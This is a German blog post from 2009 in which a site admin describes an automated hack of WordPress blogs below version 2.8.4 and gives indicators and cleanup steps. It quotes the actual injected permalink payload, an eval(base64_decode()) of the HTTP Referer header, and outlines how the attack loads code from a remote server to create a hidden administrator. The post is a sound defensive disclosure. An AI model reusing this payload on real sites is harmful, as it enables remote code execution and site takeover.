Der fiese Admin

Was für ein Freitag Abend.
Eigentlich wollte ich in Ruhe die letzten Folgen der 2. Staffel von Battlestar Galactica schauen.
Vorher nochmal E-Mails abgerufen… tja das hätte ich schon viel früher machen sollen.
Vielen dank an adameus23. Ohne ihn hätte ich vieleicht jetzt noch nicht gemerkt, dass hier was kaputt war. An allen meinen Postlinks klebte folgender Code:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Kann man sich denken, dass das nicht gut ist.

Anstatt also Battlestar Galactica zu schauen durfte ich hier sauber machen.
Aber nach einem Blick ins wordpress Support Forum stellte ich fest, dass ich nicht der einzige war.

Im folgenden die Details.

Was macht der Hack?
Durch eine Sicherheitslücke werden die Permalinks von Wordpress verändert. Durch diesen zusätzlichen Code können die Postings nicht mehr regulär abegrufen werden. Allerdings kann schädlicher Code eingefügt werden. Kann nicht nur, sondern wird weil das ganze automatisch abläuft. Nach dem Angriff wird ein neuer Benutzer in der Wordpress Administrator Gruppe erstellt. Dieser ist im Dashboard unsichtbar.
So weit war es bei mir. Bei anderen wurden auch Dateien hochgeladen und Wordpress Dateien verändert.
Da es anschliessend einen Administrator Nutzer gibt kann der natüürlich alles machen.

Wie genau funktioniert’s`?
2 Bedingungen müssen erfüllt sein: Eine Wordpress Version kleiner als 2.8.4 (die aktuellste) und Usern muss erlaubt sein sich zu registrieren. Allerdings bin ich bei letzterem nicht ganz sicher. Gut möglich, dass man auch das umgehen kann.
Zunächst werden ein paar Benutzer registriert. Simple Spam Registrationen.
Durch eine sehr üble Wordpress Sicherheitslücke ist es dem registrierten User möglich die Permalinks zu ändern und den oben genannten Code anzuhängen. Ich habe es selbst ausprobiert; da war nicht viel zu nötig. Schlimmer noch: Durch diese Sicherheitslücke können auch andere Wordpress Seiten aufgerufen und manipuliert werden die eigentlich nur dem admin vorbehalten sind. (und ich werde an dieser Stelle nen Teufel tun und sagen wie die funktioniert)
Ziwschen registrierung und verändern des Permalinks können Tage vergehen. Nachdem die Permalinks geändert wurden wird einer dieser Links aufgerufen (bei mir lagen 4 Stunden dazwischen).
Dazu wird ein gefälschter Referer übergeben. Wenn man sich den Code oben ansieht stellt man fest, dass dort der Referer encodiert und OHNE WENN UND ABER AUSGFÜHRT WIRD!!!

Den genauen Code der dort übergeben wird behalte ich erst einmal für mich. Kann man sonst zu leicht gegen aktuell infizierte verwenden.

Es werden Userdaten übergeben und zusätzlich wird noch der Inhalt einer Datei von einem chinesichen Server nachgeladen.
In dieser Text Datei steht der Code mit dem der neue Superuser angelegt wird.

Dieser hat anstelle eines Namens ebenfallls Code. Dieser ist diesmal etwas HTML und Javascript. Javascript ist nicht ganz mein Ding. Ich glaube, dass durch diesen Code verhindert wird, dass man den neuen User im Dashboard sehen kann. Da der Name dort angezeigt wird wird eben dort der Code ausgeführt.

Zudem wird die registrierung weiterer User deaktiviert. Vermutlich dammit man sich nicht über den selben Weg die Kontrolle über den Blog zurückholen kann wenn er erst einmal vollständig übernommen wurde.

Nun haben wir einen User Namens OrvalGunning70 und der ist Blog Administrator.
You have been hacked.
Und das vollautomatisch.

Cross Site Scriping aus dem Lehrbuch.

Woran erkennne ich ob ich betroffen bin?
1. An euren Permalinks hängt nun so was:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

2. Ihr habt registrierte Nutzer Namens
Andrianq (e-mail vergessen zu notieren)
Miriam (obierebelominepyb@gmail.com)
MikeWink (bugbeemershonyhe@gmail.com )
OrvalGunning70 (keine e-mail) (nur in der Datenbank zu finden)

Einer dieser Nutzer reicht schon damit die Alarmsirenen angehen sollten.

Was kann ich tun wennn ich betroffen bin?
Da es noch keine 100%ige Information gibt was genau alles mit dem Superuser angestellt wird kann ich keine 100%ige Anleitung geben.

1. Schaut nach ob Wordpress Dateien (vor allem die index.php) kürzlich verändert wurden. Gängige FTP Programme wie z.B. Filezilla zeigen das Änderungsdatum an.
2. Schaut nach ob neue Dateien erstellt wurden. Vor allem im Order wp-content/uploads

Wie mit 1+2 genaue Verfahren werden muss kann ich noch nicht sagen. Bei mir trat das nicht auf.

3. Löscht den User OrvalGunning70

Da man OrvalGunning70 nicht im Dashboard sehen kann kann man dies entweder über die Datenbannk machen indem man in der tabelle wp_users schaut welche ID der Nutzer hat und folgendes ausführen (XXX durch die ID von OrvalGunning70 ersetzen):

delete from wp_users where ID=XXX;
delete from wp_usermeta where user_id=XXX;

oder aber über einen Umweg:
Da die Registrierung deaktiviert wird sollte OrvalGunning70 der letzte registrierte Benutzer sein.
Geht im Wordpress Dahsboard zur Benutzerübersicht und sucht den zuletzt registrierten Benutzer (was irgendjemand anders zu sein scheint).
Rechtsklickt auf den Link um den User zu löschen und kopiert den Link.
Fügt diesen Link nun in eure URL zeile im Browserr ein.
In der URL steht nun unter anderem so etwas:

action=delete&user=7

Die 7 (oder welche Zahl auch immer da steht) ist die benutzer ID. Diese muss um eines ehöht werden. In meinem Beispiel wäre das dann eine 8.
Anschliessend die URL aufrufen (also einfach Enter drücken)

4. Löscht folgende User, falls vorhanden:
Andrianq (e-mail vergessen zu notieren)
Miriam (obierebelominepyb@gmail.com)
MikeWink (bugbeemershonyhe@gmail.com )

Löscht am besten alle User die nicht echt zu sein scheinen.

5. Ändert eure Permalinks wieder auf was gescheites.
6. Deaktiviert die User registrierung wenn ihr sie nicht braucht. (falls ihr nicht wisst ob ihr sie braucht dann braucht ihr sie nicht)
7. Schleunigst auf Wordpress 2.8.4 updaten. Das ist die einzige Version die derzeit als sicher gilt.
8. Es ist nie verkehrt zur Sicherheit mal sämtliche Passwörter zu ändern.

Wie kann ich mich schützen?
1. Deaktiviere User registrierungen in deinem Blog.
2. Update auf Wordpress 2.8.4; jede Version darunter ist anfällig.

Geschrieben von Der Admin
Tags: Blog, Bugs, Hacking, Wordpress, XSS

Related posts

• Wordpress Hack leitet Blog per 302 auf anyresults.net (10)
• Update auf Wordpress 2.8 (3)
• NoFollow in Wordpress Blogs (17)
• Neues Theme: I3Theme (8)
• Da ist man mal 2 Tage nicht da (3)